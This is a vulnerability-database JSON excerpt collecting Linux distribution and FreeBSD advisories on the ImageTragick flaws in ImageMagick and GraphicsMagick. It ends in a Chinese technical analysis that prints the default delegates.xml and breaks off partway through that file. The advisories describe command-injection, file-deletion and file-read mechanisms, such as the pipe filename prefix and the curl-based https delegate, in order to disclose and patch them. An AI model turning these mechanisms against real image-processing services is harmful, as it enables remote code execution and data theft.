"CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061]\n (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)\n\n", "edition": 1, "modified": "2016-05-18T14:08:13", "published": "2016-05-18T14:08:13", "id": "OPENSUSE-SU-2016:1326-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00051.html", "type": "suse", "title": "Security update for GraphicsMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714"], "description": "This update for ImageMagick fixes the following issues:\n\n - bsc#978061: A vulnerability in ImageMagick's "https" module allowed\n users to execute arbitrary shell commands on the host performing the\n image conversion. The issue had the potential for remote command\n injection. This update mitigates the vulnerability by disabling all\n access to the "https" module in the "delegates.xml" config file.\n (CVE-2016-3714)\n\n", "edition": 1, "modified": "2016-05-13T20:08:08", "published": "2016-05-13T20:08:08", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00041.html", "id": "SUSE-SU-2016:1301-1", "type": "suse", "title": "Security update for ImageMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Package : imagemagick\nVersion : 8:6.7.7.10-5+deb7u5\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make\nHTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715),\nmove (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the filename\nfor the insecure coders.\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n- -- \nBrian May <bam@debian.org>\n", "edition": 3, "modified": "2016-05-23T02:35:03", "published": "2016-05-23T02:35:03", "id": "DEBIAN:DLA-486-1:42FF7", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201605/msg00039.html", "title": "[SECURITY] [DLA 486-1] imagemagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:05:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3580-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMay 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 6, "modified": "2016-05-16T17:37:29", "published": "2016-05-16T17:37:29", "id": "DEBIAN:DSA-3580-1:70B04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00157.html", "title": "[SECURITY] [DSA 3580-1] imagemagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:52:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-2317", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2015-8808", "CVE-2016-3717", "CVE-2016-2318"], "description": "Version : 1.3.16-1.1+deb7u1\nCVE ID : CVE-2015-8808 CVE-2016-2317 CVE-2016-2318\n\t\t CVE-2016-3714 CVE-2016-3715 CVE-2016-3716\n CVE-2016-3717 CVE-2016-3718\nDebian Bug : 814732\n\nSeveral security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, execute code (CVE-2016-3714), make HTTP GET\nor FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made:\n\n1. Remove automatic detection/execution of MVG based on file header or\n file extension.\n\n2. Remove the ability to cause an input file to be deleted based on a\n filename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support,\n removing manual page support, and by adding -dSAFER to all\n ghostscript invocations.\n\n4. Sanity check the MVG image primitive filename argument to assure\n that "magick:" prefix strings will not be interpreted. Please note\n that this patch will break intentional uses of magick prefix\n strings in MVG and so some MVG scripts may fail. We will search\n for a more flexible solution.\n\nIn addition the following issues have been fixed:\n\nCVE-2015-8808\n Assure that GIF decoder does not use unitialized data and cause an\n out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318\n Vulnerabilities that allow to read or write outside memory bounds\n (heap, stack) as well as some null-pointer derreferences to cause a\n denial of service when parsing SVG files.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 9, "modified": "2016-05-21T18:52:25", "published": "2016-05-21T18:52:25", "id": "DEBIAN:DLA-484-1:5CC12", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201605/msg00037.html", "title": "[SECURITY] [DLA 484-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-11T01:29:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-8683", "CVE-2016-2317", "CVE-2016-7997", "CVE-2016-7996", "CVE-2016-3714", "CVE-2016-9830", "CVE-2016-8684", "CVE-2015-8808", "CVE-2016-7800", "CVE-2016-5240", "CVE-2016-2318", "CVE-2016-8682", "CVE-2016-5118"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3746-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 24, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : graphicsmagick\nCVE ID : CVE-2015-8808 CVE-2016-2317 CVE-2016-2318 CVE-2016-3714\n CVE-2016-3715 CVE-2016-5118 CVE-2016-5240 CVE-2016-7800\n CVE-2016-7996 CVE-2016-7997 CVE-2016-8682 CVE-2016-8683\n CVE-2016-8684 CVE-2016-9830\nDebian Bug : 814732 825800 847055\n\nSeveral vulnerabilities have been discovered in GraphicsMagick, a\ncollection of image processing tool, which can cause denial of service\nattacks, remote file deletion, and remote command execution.\n\nThis security update removes the full support of PLT/Gnuplot decoder to\nprevent Gnuplot-shell based shell exploits for fixing the CVE-2016-3714\nvulnerability.\n\nThe undocumented "TMP" magick prefix no longer removes the argument file\nafter it has been read for fixing the CVE-2016-3715 vulnerability. Since\nthe "TMP" feature was originally implemented, GraphicsMagick added a\ntemporary file management subsystem which assures that temporary files\nare removed so this feature is not needed.\n\nRemove support for reading input from a shell command, or writing output\nto a shell command, by prefixing the specified filename (containing the\ncommand) with a '|' for fixing the CVE-2016-5118 vulnerability.\n\nCVE-2015-8808\n\n Gustavo Grieco discovered an out of bound read in the parsing of GIF\n files which may cause denial of service.\n\nCVE-2016-2317\n\n Gustavo Grieco discovered a stack buffer overflow and two heap buffer\n overflows while processing SVG images which may cause denial of service.\n\nCVE-2016-2318\n\n Gustavo Grieco discovered several segmentation faults while processing\n SVG images which may cause denial of service.\n\nCVE-2016-5240\n\n Gustavo Grieco discovered an endless loop problem caused by negative\n stroke-dasharray arguments while parsing SVG files which may cause\n denial of service.\n\nCVE-2016-7800\n\n Marco Grassi discovered an unsigned underflow leading to heap overflow\n when parsing 8BIM chunk often attached to JPG files which may cause\n denial of service.\n\nCVE-2016-7996\n\n Moshe Kaplan discovered that there is no check that the provided\n colormap is not larger than 256 entries in the WPG reader which may\n cause denial of service.\n\nCVE-2016-7997\n\n Moshe Kaplan discovered that an assertion is thrown for some files in\n the WPG reader due to a logic error which may cause denial of service.\n\nCVE-2016-8682\n\n Agostino Sarubbo of Gentoo discovered a stack buffer read overflow\n while reading the SCT header which may cause denial of service.\n\nCVE-2016-8683\n\n Agostino Sarubbo of Gentoo discovered a memory allocation failure in the\n PCX coder which may cause denial of service.\n\nCVE-2016-8684\n\n Agostino Sarubbo of Gentoo discovered a memory allocation failure in the\n SGI coder which may cause denial of service.\n\nCVE-2016-9830\n\n Agostino Sarubbo of Gentoo discovered a memory allocation failure in\n MagickRealloc() function which may cause denial of service.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.3.20-3+deb8u2.\n\nFor the testing distribution (stretch), these problems (with the\nexception of CVE-2016-9830) have been fixed in version 1.3.25-5.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.3.25-6.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2016-12-24T22:03:46", "published": "2016-12-24T22:03:46", "id": "DEBIAN:DSA-3746-1:A9B4D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00330.html", "title": "[SECURITY] [DSA 3746-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-11T01:29:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", "CVE-2017-11643", "CVE-2016-5241", "CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-06-27T21:28:53", "published": "2018-06-27T21:28:53", "id": "DEBIAN:DLA-1401-1:A41C0", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201806/msg00009.html", "title": "[SECURITY] [DLA 1401-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "\nOpenwall reports:\n\nInsufficient filtering for filename passed to delegate's command\n\t allows remote code execution during conversion of several file\n\t formats. Any service which uses ImageMagick to process user\n\t supplied images and uses default delegates.xml / policy.xml,\n\t may be vulnerable to this issue.\nIt is possible to make ImageMagick perform a HTTP GET or FTP\n\t request\nIt is possible to delete files by using ImageMagick's 'ephemeral'\n\t pseudo protocol which deletes files after reading.\nIt is possible to move image files to file with any extension\n\t in any folder by using ImageMagick's 'msl' pseudo protocol.\n\t msl.txt and image.gif should exist in known location - /tmp/\n\t for PoC (in real life it may be web service written in PHP,\n\t which allows to upload raw txt files and process images with\n\t ImageMagick).\nIt is possible to get content of the files from the server\n\t by using ImageMagick's 'label' pseudo protocol.\n\n", "edition": 4, "modified": "2016-05-07T00:00:00", "published": "2016-05-03T00:00:00", "id": "0D724B05-687F-4527-9C03-AF34D3B094EC", "href": "https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html", "title": "ImageMagick -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "[6.7.2.7-4]\n- Add fix for CVE-2016-3714, CVE-2016-3715, CVE-2016-3716 and CVE-2016-3717", "edition": 4, "modified": "2016-05-09T00:00:00", "published": "2016-05-09T00:00:00", "id": "ELSA-2016-0726", "href": "http://linux.oracle.com/errata/ELSA-2016-0726.html", "title": "ImageMagick security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T17:06:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2015-8896", "CVE-2015-8895", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-5239", "CVE-2015-8897", "CVE-2016-3717", "CVE-2016-5240", "CVE-2015-8898", "CVE-2016-5118"], "description": "[6.7.2.7-5]\n- Add fix for CVE-2016-3714, CVE-2016-3715, CVE-2016-3716 and CVE-2016-3717", "edition": 5, "modified": "2016-06-16T00:00:00", "published": "2016-06-16T00:00:00", "id": "ELSA-2016-1237", "href": "http://linux.oracle.com/errata/ELSA-2016-1237.html", "title": "ImageMagick security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:12:00", "description": "\u8be6\u60c5\u6765\u6e90\uff1a[CVE-2016-3714 - ImageMagick \u547d\u4ee4\u6267\u884c\u5206\u6790 - \u4e4c\u4e91\u77e5\u8bc6\u5e93](http://drops.wooyun.org/papers/15589)\r\n\r\nImageMagick\u662f\u4e00\u6b3e\u4f7f\u7528\u91cf\u5f88\u5e7f\u7684\u56fe\u7247\u5904\u7406\u7a0b\u5e8f\uff0c\u5f88\u591a\u5382\u5546\u90fd\u8c03\u7528\u4e86\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u56fe\u7247\u5904\u7406\uff0c\u5305\u62ec\u56fe\u7247\u7684\u4f38\u7f29\u3001\u5207\u5272\u3001\u6c34\u5370\u3001\u683c\u5f0f\u8f6c\u6362\u7b49\u7b49\u3002\u4f46\u8fd1\u6765\u6709\u7814\u7a76\u8005\u53d1\u73b0\uff0c\u5f53\u7528\u6237\u4f20\u5165\u4e00\u4e2a\u5305\u542b\u300e\u7578\u5f62\u5185\u5bb9\u300f\u7684\u56fe\u7247\u7684\u65f6\u5019\uff0c\u5c31\u6709\u53ef\u80fd\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\r\n\r\n\u56fd\u5916\u7684\u5b89\u5168\u4eba\u5458\u4e3a\u6b64\u65b0\u5efa\u4e86\u4e00\u4e2a\u7f51\u7ad9\uff1a https://imagetragick.com/ \uff0c\u4e0d\u5f97\u4e0d\u8bf4\uff0c\u6709\u4e9b\u5916\u56fd\u4eba\u86ee\u4f1a\u73a9\u7684\u3002\r\n\r\n\u76f8\u5bf9\u4e8e\u4e4b\u524d\u7684\u6570\u4e2a\u62e5\u6709\u300e\u4e3b\u9875\u300f\u7684\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6d1e\u786e\u5b9e\u4e0d\u4e00\u822c\uff0c\u786e\u5b9e\u662f\u4e00\u4e2a\u53ef\u4ee5\u88ab\u5229\u7528\u7684\u597d\u6d1e\uff0c\u4e4c\u4e91\u4e3b\u7ad9\u4e0a\u4e5f\u7206\u51fa\u4e86\u6570\u4e2a\u88ab\u8be5\u6f0f\u6d1e\u5f71\u54cd\u7684\u5927\u5382\u5546\u3002\u6211\u4eec\u5148\u6765\u5206\u6790\u4e00\u4e0b\u5b83\u51fa\u73b0\u7684\u539f\u56e0\u3002\r\n\r\n### 0x01 \u539f\u7406\u5206\u6790\r\n\u4e0e\u8fd9\u4e2a\u6f0f\u6d1e\u76f8\u5173\u7684CVE\u6709CVE-2016-3714\u3001CVE-2016-3715\u3001CVE-2016-3716\u3001CVE-2016-3717\uff0c\u5176\u4e2d\u6700\u4e25\u91cd\u7684\u5c31\u662fCVE-2016-3714\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7684\u5371\u5bb3\u3002\r\n\r\nImageMagick\u6709\u4e00\u4e2a\u529f\u80fd\u53eb\u505adelegate\uff08\u59d4\u6258\uff09\uff0c\u4f5c\u7528\u662f\u8c03\u7528\u5916\u90e8\u7684lib\u6765\u5904\u7406\u6587\u4ef6\u3002\u800c\u8c03\u7528\u5916\u90e8lib\u7684\u8fc7\u7a0b\u662f\u4f7f\u7528\u7cfb\u7edf\u7684system\u547d\u4ee4\u6765\u6267\u884c\u7684\uff08 https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347 \uff09\r\n\r\n\u6211\u4eec\u5728ImageMagick\u7684\u9ed8\u8ba4\u914d\u7f6e\u6587\u4ef6\u91cc\u53ef\u4ee5\u770b\u5230\u6240\u6709\u7684\u59d4\u6258\uff1a /etc/ImageMagick/delegates.xml\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE delegatemap [\r\n<!ELEMENT delegatemap (delegate)+>\r\n<!ELEMENT delegate (#PCDATA)>\r\n<!ATTLIST delegate decode CDATA #IMPLIED>\r\n<!ATTLIST delegate encode CDATA #IMPLIED>\r\n<!ATTLIST delegate mode CDATA #IMPLIED>\r\n<!ATTLIST delegate spawn CDATA #IMPLIED>\r\n<!ATTLIST delegate stealth CDATA #IMPLIED>\r\n<!ATTLIST delegate thread-support CDATA #IMPLIED>\r\n<!ATTLIST delegate command CDATA #REQUIRED>\r\n]>\r\n<!--\r\n Delegate command file.\r\n \r\n Commands which specify\r\n \r\n decode=\"in_format\" encode=\"out_format\"\r\n \r\n specify the rules for converting from in_format to out_format These\r\n rules may be used to translate directly between formats.\r\n \r\n Commands which specify only\r\n \r\n decode=\"in_format\"\r\n \r\n specify the rules for converting from in_format to some format that\r\n ImageMagick will automatically recognize. These rules are used to\r\n decode formats.\r\n \r\n Commands which specify only\r\n \r\n encode=\"out_format\"\r\n \r\n specify the rules for an \"encoder\" which may accept any input format.\r\n \r\n For delegates other than ps:*, pcl:*, and mpeg:* the substitution rules are\r\n as follows:\r\n \r\n %i input image filename\r\n %o output image filename\r\n %u unique temporary filename\r\n %Z unique temporary filename\r\n %# input image signature\r\n %b image file size\r\n %c input image comment\r\n %g image geometry\r\n %h image rows (height)\r\n %k input image number colors\r\n %l image label\r\n %m input image format\r\n %p page number\r\n %q input image depth\r\n %s scene number\r\n %w image columns (width)\r\n %x input image x resolution\r\n %y input image y resolution\r\n \r\n Set option delegate:bimodal=true to process bimodal delegates otherwise they\r\n are ignored.\r\n \r\n If stealth=\"True\" the delegate is not listed in user requested\r\n \"-list delegate\" listings. These are typically special internal delegates.\r\n \r\n If spawn=\"True\" ImageMagick will not way for the delegate to finish,\r\n nor will it read any output image. It will only wait for either the input\r\n file to be removed (See \"ephemeral:\" coder) indicating that the input file\r\n has been read, or a maximum time limit of 2 seconds.\r\n-->\r\n<delegatemap>\r\n <delegate decode=\"autotrace\" stealth=\"True\" command=\""convert" "%i" "pnm:%u"\\n"autotrace" -input-format pnm -output-format svg -output-file "%o" "%u"\"/>\r\n <delegate decode=\"blender\" command=\""blender" -b "%i" -F PNG -o "%o""\\n"convert" -concatenate "%o*.png" "%o"\"/>\r\n <delegate decode=\"browse\" stealth=\"True\" spawn=\"True\" command=\""xdg-open" http://www.imagemagick.org/; rm "%i"\"/>\r\n <delegate decode=\"cdr\" command=\""uniconvertor" "%i" "%o.svg"; mv "%o.svg" "%o"\"/>\r\n <delegate decode=\"cgm\" thread-support=\"False\" command=\""ralcgm" -d ps -oC < "%i" > "%o" 2> "%Z"\"/>\r\n <delegate decode=\"dvi\" command=\""dvips" -q -o "%o" "%i"\"/>\r\n <delegate decode=\"dng:decode\" command=\""ufraw-batch" --silent --create-id=also --out-type=png --out-depth=16 "--output=%u.png" "%i"\"/>\r\n <delegate decode=\"dot\" command='"dot" -Tsvg "%i" -o "%o"' />\r\n <delegate decode=\"edit\" stealth=\"True\" command=\""/etc/alternatives/x-terminal-emulator" -title "Edit Image Comment" -e vi "%o"\"/>\r\n <delegate decode=\"eps\" encode=\"pdf\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 "-sDEVICE=pdfwrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"eps\" encode=\"ps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=nodevice" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"fig\" command=\""fig2dev" -L ps "%i" "%o"\"/>\r\n <delegate decode=\"plt\" command=\""echo" "set size 1.25,0.62; set terminal postscript portrait color solid; set output \\'%o\\'; load \\'%i\\'" > "%u";"gnuplot" "%u"\"/>\r\n <delegate decode=\"hpg\" command=\""hp2xx" -q -m eps -f `basename "%o"` "%i"; mv -f `basename "%o"` "%o"\"/>\r\n <delegate decode=\"hpgl\" command=\"if [ -e hp2xx -o -e /usr/bin/hp2xx ]; then hp2xx -q -m eps -f `basename "%o"` "%i"; mv -f `basename "%o"` "%o"; else echo "You need to install hp2xx to use HPGL files with ImageMagick."; exit 1; fi\"/>\r\n <delegate decode=\"htm\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"html\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"https\" command=\""curl" -s -k -o "%o" "https:%M"\"/>\r\n <delegate decode=\"ilbm\" command=\""ilbmtoppm" "%i" > "%o"\"/>\r\n <delegate decode=\"man\" command=\""groff" -man -Tps "%i" > "%o"\"/>\r\n <delegate decode=\"mpeg:decode\" command=\""ffmpeg" -v -1 -i "%i" -vframes %S -vcodec pam -an -f rawvideo -y "%u.pam" 2> "%Z"\"/>\r\n <delegate encode=\"mpeg:encode\" stealth=\"True\" command=\""ffmpeg" -v -1 -mbd rd -trellis 2 -cmp 2 -subcmp 2 -g 300 -i "%M%%d.jpg" "%u.%m" 2> "%Z"\"/>\r\n <delegate decode=\"sid\" command=\""mrsidgeodecode" -if sid -i "%i" -of tif -o "%o" > "%u"\"/>\r\n <delegate decode=\"pcl:color\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ppmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pcl:cmyk\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pamcmyk32" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pcl:mono\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pdf\" encode=\"eps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"pdf\" encode=\"ps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=nodevice" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"tiff\" encode=\"launch\" mode=\"encode\" command=\""gimp" "%i"\"/>\r\n <delegate decode=\"pnm\" encode=\"ilbm\" mode=\"encode\" command=\""ppmtoilbm" -24if "%i" > "%o"\"/>\r\n <delegate decode=\"pov\" command=\""povray" "+i%i" -D0 "+o%o" +fn%q +w%w +h%h +a -q9 "-kfi%s" "-kff%n";"convert" -concatenate "%o*.png" "%o"\"/>\r\n <delegate decode=\"ps\" encode=\"eps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"ps\" encode=\"pdf\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pdfwrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"ps\" encode=\"print\" mode=\"encode\" command=\"lpr "%i"\"/>\r\n <delegate decode=\"ps:alpha\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:cmyk\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pam" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:color\" stealth=\"True\" command=\""gs" -q -dQUIET 